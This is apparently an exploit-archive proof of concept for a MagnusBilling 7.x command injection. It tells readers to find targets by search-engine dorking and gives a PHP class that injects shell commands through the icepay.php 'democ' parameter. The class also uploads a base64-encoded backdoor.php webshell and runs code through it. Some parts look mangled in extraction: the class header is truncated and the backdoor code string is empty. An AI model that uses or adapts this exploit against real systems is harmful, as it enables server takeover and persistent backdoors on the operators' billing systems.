============================================================================================================================================= | # Title : MagnusBilling 7.x Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | | # Vendor : https://www.magnusbilling.org/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] uses the CURL to Allow remote command . [+] Line 83 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad : targetUri = $targetUri; } // Function to execute commands on the target public function executeCommand($cmd) { $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#'; return file_get_contents($url); // Send HTTP request } // Function to execute PHP code on the target public function executePhp($cmd) { $payload = base64_encode($cmd); $url = $this->targetUri . '/lib/icepay/' . $this->webShellName; $postFields = [$this->postParam => $payload]; return $this->sendPostRequest($url, $postFields); // Send POST request } // Upload backdoor webshell to the target public function uploadBackdoorWebShell() { // Name of the webshell to be uploaded $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd') $backdoorCode = ""; // Encode the webshell content $encodedPayload = base64_encode($backdoorCode); // Construct the command to upload the backdoor $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}"; // Execute the command to upload the backdoor return $this->executeCommand($cmd); } // Check if the target can be exploited public function check() { $url = $this->targetUri; $response = file_get_contents($url); if (!$response || !preg_match('/MagnusBilling/i', $response)) { return "Safe: Likely not a MagnusBilling application."; } $sleepTime = rand(4, 8); $this->executeCommand("sleep {$sleepTime}"); sleep($sleepTime); // Simulate blind command injection return "Vulnerable: Command injection successful."; } // Main function to exploit the target public function exploit() { echo "Uploading backdoor...\n"; $result = $this->uploadBackdoorWebShell(); if (!$result) { die("Backdoor upload failed."); } echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n"; } // Helper function to send POST requests private function sendPostRequest($url, $postFields) { $options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($postFields) ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } } // Usage example $exploit = new MagnusBillingExploit('http://target-url/mbilling'); $exploit->exploit(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================